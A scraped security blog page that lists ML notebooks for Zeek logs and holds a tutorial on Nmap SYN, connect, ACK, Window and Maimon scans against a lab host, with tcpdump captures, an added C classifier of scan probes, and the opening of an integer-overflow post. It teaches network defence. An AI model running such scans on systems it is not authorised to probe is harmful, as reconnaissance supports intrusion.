href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/15%20-%20Beginning%20Deep%20Learning%2C%20-%20Linear%20Regression%2C%20PyTorch.ipynb" target="_blank">15 - Beginning Deep Learning - Linear Regression, PyTorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/16%20-%20Beginning%20Deep%20Learning%2C%20-%20Classification%2C%20Tensorflow.ipynb" target="_blank">16 - Beginning Deep Learning - Classification, 
Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/17%20-%20Beginning%20Deep%20Learning%2C%20-%20Classification%2C%20Pytorch.ipynb" target="_blank">17 - Beginning Deep Learning - Classification, Pytorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/18%20-%20Beginning%20Deep%20Learning%20Classification%20-%20Regression%20-%20Tensorflow%20-%20Multiple%20Input%2C%20Multiple%20Output%20(MIMO)-%20Functional%20API.ipynb" target="_blank">18 - Beginning Deep Learning - Classification - regression - MIMO - Functional API Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/19%20-%20Beginning%20Deep%20Learning%2C%20-%20Convolution%20Networks%20-%20Tensorflow.ipynb" target="_blank">19 - Beginning Deep Learning - Convolution Networks - Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/20%20-%20Beginning%20Deep%20Learning%2C%20-%20Convolution%20Networks%20-%20PyTorch.ipynb" target="_blank">20 - Beginning Deep Learning - Convolution Networks - PyTorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/21%20-%20Beginning%20Regularization%20-%20Early%20Stopping%2C%20Dropout%2C%20L2%20(Ridge)%2C%20L1%20(Lasso).ipynb" target="_blank">21 - Beginning Regularization - Early Stopping, Dropout, L2 (Ridge), L1 (Lasso)</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/22%20-%20Beginning%20Model%20TFServing.ipynb" target="_blank">22 - Beginning Model TFServing</a><br /><br /><div>
But conn.log is not the only log file within Zeek. Let's build some models for DNS and HTTP logs. <br />
I chose unsupervised learning because there are no labels coming with this data. <br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/23%20-%20Continuing%20Anomaly%20Learning%20-%20Zeek%20DNS%20Log%20-%20Machine%20Learning.ipynb" target="_blank">23 - Continuing Anomaly Learning - Zeek DNS Log - Machine Learning</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/24%20-%20Continuing%20Unsupervised%20Learning%20-%20Zeek%20HTTP%20Log%20-%20Machine%20Learning.ipynb" target="_blank">24 - Continuing Unsupervised Learning - Zeek HTTP Log - Machine Learning</a><br /><br /><div>
This was a specific ask by someone in one of my classes. <br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/25%20-%20Beginning%20-%20Reading%20Executables%20and%20Building%20a%20Neural%20Network%20to%20make%20predictions%20on%20suspicious%20vs%20non-suspicious%20-%20version%202.ipynb" target="_blank">25 - Beginning - Reading Executables and Building a Neural Network to make predictions on suspicious vs non-suspicious</a><br /><br />
With 25 notebooks in this series, it is quite possible there are things I could have or should have done differently. <br />
If you find anything you think fits those criteria, drop me a line. <br />
If you find this series beneficial, I would greatly appreciate your feedback.
</div><div><br /></div><div>Some other notebooks I think you might find beneficial:</div><div>- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/LinearRegression%20-%20Beginning%20Stochastic%20Gradient%20Descent.ipynb" target="_blank">Beginning Linear Regression: SGD</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/SANS%20SEC595%20-%20Webcast%20-%20AutoEncoder%20Anomaly%20Detection.ipynb" target="_blank">SANS SEC595 - Webcast - AutoEncoder Anomaly Detection</a> <br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/SANS-ML-Presentation-SIEM-Alerts-Predictions.ipynb" target="_blank">SANS-ML-Presentation-SIEM-Alerts-Predictions</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Understanding%20Decision%20Tree%20with%20dTreeviz.ipynb" target="_blank">Understanding Decision Tree with dTreeviz</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/beginning-sql-alchemy-blog.ipynb" target="_blank">Beginning SQLAlchemy</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Fourrier%20Transform%20for%20Beacon%20Detection%20-%20Blog.ipynb" target="_blank">Beginning Fourier Transform for Beacon Detection</a></div><div>- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Continuing%20Back%20Propagation%20-%20Gradient%20Descent%20-%20Tf%20GradientTape%20and%20PyTorch.ipynb" target="_blank">Continuing Back Propagation - Gradient Descent - TF GradientTape and PyTorch</a><br /></div><div><br /></div><div>Get the notebooks by clicking the links above or from my blog: <a href="https://www.securitynik.com/2023/05/beginning-machine-and-deep-learning.html" target="_blank">www.securitynik.com</a> or my <a href="https://github.com/SecurityNik/Data-Science-and-ML/tree/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs" target="_blank">GitHub: github.com/SecurityNik</a></div></div>Nik 
Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com6tag:blogger.com,1999:blog-7303400454979750101.post-73094069628288441082023-01-03T19:31:00.002-08:002023-01-03T19:41:25.307-08:00Understanding NMAP's scan techniques: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans<p>A member of the <a href="https://cybersecurecatalyst.ca/" target="_blank">Toronto Metropolitan University/Rogers Cybersecure Catalyst program</a>, a program I'm currently a mentor for, was using Nmap and could not really see the difference when using the <b>-sW<i> </i></b>and <b>-sM</b> scan techniques. To help that student and others using Nmap, I thought I should put together a quick blog post.</p><p>Before getting into the <b>-sW<i> </i></b>and <b>-sM</b>, let's take a look at some other TCP scan options. This matters because when we run these tools, we should understand what they are doing in the background.</p><p>Starting with the Nmap SYN Scan (-sS), we get</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sS 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:04 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00046s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<span style="color: #fcff01;"><b><span>445/tcp open microsoft-ds syn-ack ttl 128</span>
</b></span><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p>Looking at this scan activity under the hood, we see ...</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:04:18.309853 IP 10.0.0.108.37698 > 10.0.0.106.445: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 3556209128, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">16:04:18.310294 IP 10.0.0.106.445 > 10.0.0.108.37698: </span><b><span style="color: #fcff01;">Flags [S.]</span></b><span style="color: white;">, seq 2634056672, ack 3556209129, win 64240, options [mss 1460], length 0</span></span>
<span><span style="color: white;">16:04:18.310312 IP 10.0.0.108.37698 > 10.0.0.106.445: </span><b><span style="color: red;">Flags [R]</span></b><span style="color: white;">, seq 3556209129, win 0, length 0</span></span>
</pre></div>
<p>From above, we see three packets. The first is the stimulus: Nmap sends a <b>SYN [S]</b> packet and receives a <b>SYN/ACK [S.]</b>. This "<b>[S.]</b>" tells Nmap the port is "open". Hence the Nmap result above states "<b>open</b>" and the reason states "<b>syn-ack</b>". On a side note, do you know why there is a third packet, the one in red with "<b>[R]</b>"? Leave a comment if you do. Getting into the third packet is not important for this post, but I would love to hear your thoughts if you have any.</p><p>Looking at the connect scan (-sT):</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sT 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:04 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00047s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<b><span style="color: #fcff01;"><span>445/tcp open microsoft-ds syn-ack</span>
</span></b>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p>Looking at the output, it does not look any different from the SYN scan (-sS). Keep in mind that both of these scans so far returned a state of "<b>open</b>" and a reason of "<b>syn-ack</b>".</p><p>Looking under the hood, we immediately see a difference between the two scans:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:05:04.611618 IP 10.0.0.108.39368 > 10.0.0.106.445:</span><span style="color: #fcff01;"><b> Flags </b><b>[S]</b></span><span style="color: white;">, seq 1022019330, win 64240, options [mss 1460,sackOK,TS val 322962533 ecr 0,nop,wscale 7], length 0</span></span>
<span><span style="color: white;">16:05:04.612014 IP 10.0.0.106.445 > 10.0.0.108.39368: </span><span style="color: #fcff01;"><b>Flags </b><b>[S.]</b></span><span style="color: white;">, seq 486308284, ack 1022019331, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0</span></span>
<span><span style="color: white;">16:05:04.612030 IP 10.0.0.108.39368 > 10.0.0.106.445: </span><span style="color: #fcff01;"><b>Flags </b><b>[.]</b></span><span style="color: white;">, ack 1, win 502, length 0</span></span>
<span><span style="color: white;">16:05:04.612054 IP 10.0.0.108.39368 > 10.0.0.106.445: </span><span style="color: red;"><b>Flags </b><b>[R.]</b></span><span style="color: white;">, seq 1, ack 1, win 502, length 0</span></span>
</pre></div>
<p>From a simplistic view, the connect scan resulted in four packets, while the SYN scan resulted in three. The first three packets are the complete TCP three-way handshake. Then there is a fourth packet. As above, it is not important for what we are interested in, but if you know why the "<b>[R.]</b>" packet is there, do leave a comment ;-).</p><p>If we look at the two Nmap outputs so far, there is really little to no difference. The simplistic view of looking only at the Nmap output only tells you this host is alive.</p><p>Running the ACK scan (-sA):</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sA 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:09 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00030s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<span style="color: #fcff01;"><b><span>445/tcp unfiltered microsoft-ds reset ttl 128</span>
</b></span><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.64 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p>Once again, the output looks basically the same as in the earlier two. However, if you pay close attention, you see the state is "<b>unfiltered</b>". Why unfiltered?</p><p>Looking under the hood, we see two packets this time.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:09:21.794159 IP 10.0.0.108.50010 > 10.0.0.106.445: </span><b><span style="color: #fcff01;">Flags </span></b><b><span style="color: #fcff01;">[.]</span></b><span style="color: white;">, ack 2598207558, win 1024, length 0</span></span>
<span style="color: white;">16:09:21.794442 IP 10.0.0.106.445 > 10.0.0.108.50010: </span><span style="color: #fcff01;"><b>Flags </b></span><span style="color: #fcff01;"><b>[R]</b></span><span style="color: white;">, seq 2598207558, win 0, length 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p>So far, the output from the first two scans is basically the same, with a state of "<b>open</b>", while this third one reports "<b>unfiltered</b>". The real difference in how they operate can be seen under the hood. While the two previous examples had a stimulus of "<b>[S]</b>", this example has a stimulus of "<b>[.]</b>" (a bare ACK). Nmap knows the port is unfiltered because it received the "<b>[R]</b>" in response: an ACK probe only tells us whether a packet can reach the port, not whether the port is open or closed. We can confirm this by looking at the Nmap output, where the reason shows "<b>reset</b>" beside "<b>unfiltered</b>".</p><p>Now to the two scan techniques the user was really concerned about: <b>-sW</b> and <b>-sM</b>. Starting with <b>-sW</b>:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sW 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:13 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00038s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<span style="color: #fcff01;"><b><span>445/tcp closed microsoft-ds reset ttl 128</span>
</b></span><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.64 seconds</span>
</pre></div>
<p>Notice the state is "<b>closed</b>". How does Nmap know it is closed? We should now have an understanding of where to find the answer.</p><p>Looking under the hood, we see two packets.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:13:20.105897 IP 10.0.0.108.46454 > 10.0.0.106.445:</span><b><span style="color: #fcff01;"> Flags [.]</span></b><span style="color: white;">, ack 3050815645, win 1024, length 0</span></span>
<span><span style="color: white;">16:13:20.106254 IP 10.0.0.106.445 > 10.0.0.108.46454: </span><b><span style="color: #fcff01;">Flags [R]</span></b><span style="color: white;">, seq 3050815645, win 0, length 0</span></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
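<p>The four exchanges captured above, plus the Maimon probe that follows, as an added triage example that is not code from the post: it parses tcpdump -nn lines (the post's captures, re-typed here as a constructed sample), labels each stimulus by the way Nmap builds it, and reproduces the port state Nmap reports, including the no-response cases taken from the nmap man page the post references rather than from any capture on this page. It assumes one scanner and one target port, so flows are keyed on the scanner's ephemeral port.</p>

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: tcpdump -nn lines re-typed from the post's captures, one
 * flow per scan type (-sS, -sT, -sA, -sW, -sM). The scanner's own RST/ACK after
 * the connect scan's handshake is kept so that the flow logic has to skip it. */
static const char *SAMPLE[] = {
    "16:04:18.309853 IP 10.0.0.108.37698 > 10.0.0.106.445: Flags [S], seq 3556209128, win 1024, options [mss 1460], length 0",
    "16:04:18.310294 IP 10.0.0.106.445 > 10.0.0.108.37698: Flags [S.], seq 2634056672, ack 3556209129, win 64240, options [mss 1460], length 0",
    "16:05:04.611618 IP 10.0.0.108.39368 > 10.0.0.106.445: Flags [S], seq 1022019330, win 64240, options [mss 1460,sackOK,TS val 322962533 ecr 0,nop,wscale 7], length 0",
    "16:05:04.612014 IP 10.0.0.106.445 > 10.0.0.108.39368: Flags [S.], seq 486308284, ack 1022019331, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0",
    "16:05:04.612054 IP 10.0.0.108.39368 > 10.0.0.106.445: Flags [R.], seq 1, ack 1, win 502, length 0",
    "16:09:21.794159 IP 10.0.0.108.50010 > 10.0.0.106.445: Flags [.], ack 2598207558, win 1024, length 0",
    "16:09:21.794442 IP 10.0.0.106.445 > 10.0.0.108.50010: Flags [R], seq 2598207558, win 0, length 0",
    "16:13:20.105897 IP 10.0.0.108.46454 > 10.0.0.106.445: Flags [.], ack 3050815645, win 1024, length 0",
    "16:13:20.106254 IP 10.0.0.106.445 > 10.0.0.108.46454: Flags [R], seq 3050815645, win 0, length 0",
    "16:17:06.538048 IP 10.0.0.108.45642 > 10.0.0.106.445: Flags [F.], seq 0, ack 925611209, win 1024, length 0",
    "16:17:06.538370 IP 10.0.0.106.445 > 10.0.0.108.45642: Flags [R], seq 925611209, win 0, length 0",
};
#define NSAMPLE (sizeof SAMPLE / sizeof SAMPLE[0])
#define MAX_FLOWS 32

typedef struct { unsigned sport, dport; char flags[8]; long long seq, win; int stack_opts; } pkt_t;
typedef struct { pkt_t probe, reply; int have_reply; } flow_t;

/* Parse one tcpdump -nn line, keeping only what the classification needs. */
static int parse_line(const char *line, pkt_t *p)
{
    unsigned a[4], b[4];
    int n = 0;
    const char *q;
    if (sscanf(line, "%*s IP %u.%u.%u.%u.%u > %u.%u.%u.%u.%u: Flags [%7[^]]]%n",
               &a[0], &a[1], &a[2], &a[3], &p->sport, &b[0], &b[1], &b[2], &b[3],
               &p->dport, p->flags, &n) != 11)
        return 0;
    p->seq = (q = strstr(line + n, "seq ")) ? atoll(q + 4) : -1;
    p->win = (q = strstr(line + n, "win ")) ? atoll(q + 4) : -1;
    /* Nmap's raw SYN carries only an MSS option (win 1024 on the page); a SYN from
     * the OS stack, as in the connect scan, also negotiates SACK/timestamps/wscale. */
    p->stack_opts = strstr(line + n, "sackOK") || strstr(line + n, "wscale") || strstr(line + n, "TS val");
    return 1;
}

/* Label the first scanner-to-target packet of a flow by how Nmap builds it. */
static const char *probe_kind(const pkt_t *p)
{
    if (!strcmp(p->flags, "S"))  return p->stack_opts ? "stack-syn (-sT)" : "raw-syn (-sS)";
    if (!strcmp(p->flags, "."))  return "ack-probe (-sA/-sW)";   /* bare ACK, no handshake first */
    if (!strcmp(p->flags, "F.") && p->seq == 0) return "maimon (-sM)"; /* FIN/ACK with seq 0 */
    return "other";
}

/* Port state Nmap reports for a stimulus/response pair: the cases captured in the
 * post, plus the no-response cases documented in the nmap man page it references. */
static const char *port_state(const char *kind, const pkt_t *reply)
{
    int rst = reply && (!strcmp(reply->flags, "R") || !strcmp(reply->flags, "R."));
    if (strstr(kind, "syn")) {
        if (reply && !strcmp(reply->flags, "S.")) return "open";
        return rst ? "closed" : "filtered";
    }
    if (strstr(kind, "ack-probe")) {
        if (!rst) return "filtered";
        /* -sA stops at unfiltered; -sW additionally reads the window field of the RST */
        return reply->win > 0 ? "unfiltered (-sA) / open (-sW)"
                              : "unfiltered (-sA) / closed (-sW)";
    }
    if (strstr(kind, "maimon")) return rst ? "closed" : "open|filtered";
    return "unknown";
}

/* Group packets into flows keyed on the scanner's ephemeral port (assumes one
 * scanner and one target port, as on the page). First packet = stimulus, first
 * packet back from the target = reply; later scanner-side packets are ignored. */
static int analyze(const char **lines, size_t n, flow_t *out, int max)
{
    int count = 0, k;
    pkt_t p;
    for (size_t i = 0; i < n; i++) {
        if (!parse_line(lines[i], &p)) continue;
        for (k = 0; k < count; k++)
            if (out[k].probe.sport == p.sport || out[k].probe.sport == p.dport) break;
        if (k == count && count < max) {            /* new flow: this is the stimulus */
            out[count].probe = p; out[count].have_reply = 0; count++;
        } else if (k < count && !out[k].have_reply && out[k].probe.sport == p.dport) {
            out[k].reply = p; out[k].have_reply = 1;   /* first packet from the target */
        }
    }
    return count;
}

int main(void)
{
    flow_t f[MAX_FLOWS];
    int n = analyze(SAMPLE, NSAMPLE, f, MAX_FLOWS);
    for (int i = 0; i < n; i++) {
        const char *kind = probe_kind(&f[i].probe);
        const pkt_t *r = f[i].have_reply ? &f[i].reply : NULL;
        printf("sport %-5u %-20s reply %-4s -> %s\n", f[i].probe.sport, kind, r ? r->flags : "none", port_state(kind, r));
    }
    return 0;
}
```

<p>On real traffic, a bare ACK or a FIN/ACK with sequence number 0 arriving with no preceding SYN from that source is the part of this a detection rule keys on; the port-state logic just shows what the scanner learns from the reply.</p>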
<p>This is much the same as what we saw in the ACK scan. That is because this scan is exactly the same as the ACK scan on the wire; the only difference is that it examines the TCP Window field of the "<b>[R]</b>" packet that is returned (here win 0, hence "closed").</p><p>Wrapping this up with a Maimon scan (-sM):</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sM 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:17 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00034s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<b><span style="color: #fcff01;"><span>445/tcp closed microsoft-ds reset ttl 128</span>
</span></b><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p>Once again, the state is "<b>closed</b>". The output between <b>-sW</b> and <b>-sM</b> looks basically the same.</p><p>Looking under the hood ...</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:17:06.538048 IP 10.0.0.108.45642 > 10.0.0.106.445: </span><b><span style="color: #fcff01;">Flags [F.]</span></b><span style="color: white;">, seq 0, ack 925611209, win 1024, length 0</span></span>
<span><span style="color: white;">16:17:06.538370 IP 10.0.0.106.445 > 10.0.0.108.45642: </span><b><span style="color: #fcff01;">Flags [R]</span></b><span style="color: white;">, seq 925611209, win 0, length 0</span></span></pre></div><p>... We have two packets. Notice the difference in the flags? The <b>-sW</b> has flags "<b>[.]</b>" and "<b>[R]</b>". The <b>-sM</b> have flags "<b>[F.]</b>" and "<b>[R]</b>".</p><p>You might have noticed, the last 3 outputs where there is the "[R]" RST flag, I did not put them in red. This is because this behavior was expected. The other two above, they are generated from your system's TCP/IP stack because it was not aware of the initial "<b>[S]</b>" packet being sent.</p><p>If you are reading this and wonder why I did not go more into what the different flags mean, then come hang out with us at one of the upcoming <b><a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/" target="_blank">SANS SEC503: Network Monitoring and Threat Detection in Depth</a>, </b>where we go deep into packets learn more.</p><p>Hopefully this clear up any concerns users of Nmap have, as it relates to not seeing any difference in the outputs.</p><p><br />Reference:<br /><a href="https://linux.die.net/man/1/nmap">https://linux.die.net/man/1/nmap</a></p>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1tag:blogger.com,1999:blog-7303400454979750101.post-32015323161172991312022-11-02T19:56:00.002-07:002022-11-10T22:55:16.280-08:00Beginning Integer Overflow/Underflow - Signed and Unsigned integers<p>Still on the journey providing mentorship to the <a href="https://www.cybersecurecatalyst.ca/" target="_blank">SANS/Ryerson/Rogers</a> Cyber Secure Catalyst Program.</p><p>In this post, the ask was to explain integer overflow/underflow. </p><p>Keeping it simple! 
The basic idea: on a 32-bit system, or in code compiled as 32-bit, an integer, signed or unsigned, occupies 32 bits. If we calculate 2**32 we get <b>4,294,967,296</b> possible values. For an unsigned int this means the possible values are <b>0 to 4,294,967,295</b>, as unsigned int only allows for non-negative values. Signed int, on the other hand, allows for negative numbers and has a range of <b>−2,147,483,648 to 2,147,483,647</b>. Note that this problem is not only about 32-bit integers; the idea is basically applying a value larger than the datatype was designed to accommodate. Int is just the example used in this case, but it could have been something else.</p><p>Let's define a small program to learn more:</p><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #999999; font-style: italic;">// Define an unsigned variable</span>
<span style="color: #6ab825; font-weight: bold;">unsigned</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">=</span> <span style="color: #fcff01;"><b>429496725</b></span><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
